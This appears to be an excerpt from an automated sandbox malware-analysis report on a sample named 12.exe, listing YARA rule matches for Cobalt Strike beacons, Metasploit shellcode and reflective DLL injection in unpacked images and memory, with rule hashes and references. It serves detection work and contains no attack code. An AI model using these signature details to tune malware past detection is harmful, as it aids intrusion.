                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DB4763 CreateProcessWithLogonW,GetLastError,_memset,GetLastError,0_2_00DB4763
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D940FD0_2_00D940FD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D8A1DB0_2_00D8A1DB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD81900_2_00DD8190
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD73200_2_00DD7320
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D944D10_2_00D944D1
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D975900_2_00D97590
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D967200_2_00D96720
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D948DD0_2_00D948DD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD48280_2_00DD4828
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D8282F0_2_00D8282F
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DC59E90_2_00DC59E9
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD7BC00_2_00DD7BC0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D94CFD0_2_00D94CFD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D93C280_2_00D93C28
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCADDB0_2_00DCADDB
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D84DE90_2_00D84DE9
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D96D450_2_00D96D45
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00D96FC00_2_00D96FC0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD50D10_2_00DD50D1
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD58FD0_2_00DD58FD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD48280_2_00DD4828
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DC59E90_2_00DC59E9
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD81900_2_00DD8190
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD79450_2_00DD7945
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD7BC00_2_00DD7BC0
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD73200_2_00DD7320
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD54DD0_2_00DD54DD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DD4CFD0_2_00DD4CFD
                    Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00DCADDB0_2_00DCADDB
                    Source: C:\Users\user\Desktop\12.exeCode function: String function: 00DCB3A4 appears 76 times
                    Source: C:\Users\user\Desktop\12.exeCode function: String function: 00DCA7D0 appears 46 times
                    Source: C:\Users\user\Desktop\12.exeCode function: String function: 00D8A7A4 appears 35 times
                    Source: 12.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
